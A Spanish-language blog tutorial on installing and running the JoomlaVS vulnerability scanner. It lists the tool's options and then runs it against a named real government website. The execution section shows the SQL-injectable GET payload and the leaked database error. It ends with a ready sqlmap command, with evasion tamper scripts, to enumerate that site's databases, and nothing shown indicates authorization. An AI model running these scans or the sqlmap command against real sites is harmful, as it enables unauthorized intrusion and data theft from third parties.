¿Que es Joomalavs?
Es un escaner de vulnerabilidades elaborado en Ruby, con el objetivo de encontrar agujeros de seguridad en componentes, módulos y temas instalados en la plataforma web.
Instalación:
root@kali:~# git clone https://github.com/rastating/joomlavs.git
root@kali:~# cd joomlavs/
root@kali:~/joomlavs# sudo gem install bundler && bundle install
descargamos el repositorio en Github y proceder a instalar el bundler y los requerimientos gems, deben instalar las dependencias.
root@kali:~# sudo apt-get install build-essential patch
root@kali:~# sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libcurl4-openssl-dev
Completado toda la instalación pueden ver el modo de uso.
Opciones:
uso: joomlavs.rb [opciones]
Opciones básicas
-u, --url La URL / dominio de Joomla que se va a escanear.
--basic-auth <nombre de usuario: contraseña> Las credenciales básicas de autenticación HTTP
-v, --verbose Activar modo detallado
Opciones de enumeración
-a, --scan-all Analiza todas las extensiones vulnerables
-c, --scan-components Búsqueda de componentes vulnerables
-m, --scan-modules Búsqueda de módulos vulnerables
-t, --scan-templates Búsqueda de plantillas vulnerables
-q, --quiet Escanear utilizando sólo métodos pasivos
Opciones avanzadas
--follow-redirection Seguir automáticamente los redireccionamientos
--no-color Deshabilitar colores en la salida
--proxy <[protocolo: //] host: puerto> HTTP, SOCKS4 SOCKS4A y SOCKS5 son compatibles. Si no se proporciona ningún protocolo, HTTP se utilizará
--proxy-auth <nombre de usuario: contraseña> Las credenciales de autenticación de proxy
--threads El número de subprocesos a utilizar cuando se solicitan multi-subprocesos
--user-agent La cadena del agente de usuario para enviar con todas las peticiones
Ejecución:
root@kali:~/joomlavs# ruby joomlavs.rb -u http://www.agroarequipa.gob.pe -a
Estamos realizando un análisis completo de todos modulos, plugins y temas vulnerables que se encuentren en dicho servidor...
En consecuente nos arrojan varias vulnerabilidades de tipo SQL Injection, con las referencias de los PoC en Exploit-DB:
GET PAYLOAD:
GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1
Error-Based blind / inyección a ciegas.
Vista de error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY t1.`order` asc' at line 1 SQL=SELECT t1.*,t2.rate FROM #__bwg_image as t1 LEFT JOIN (SELECT rate, image_id FROM #__bwg_image_rate WHERE ip="204.52.135.190") as t2 ON t1.id=t2.image_id WHERE t1.published=1 AND t1.gallery_id= ORDER BY t1.`order` asc
Otros parámetros:
Todos los parametros simple_prod.
Testando con SQLMAP:
sqlmap -u "http://www.agroarequipa.gob.pe/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1" -p theme_id --random-agent --dbms=MySQL --tamper="charencode,between" --dbs
Saludos!
0 comentarios:
Publicar un comentario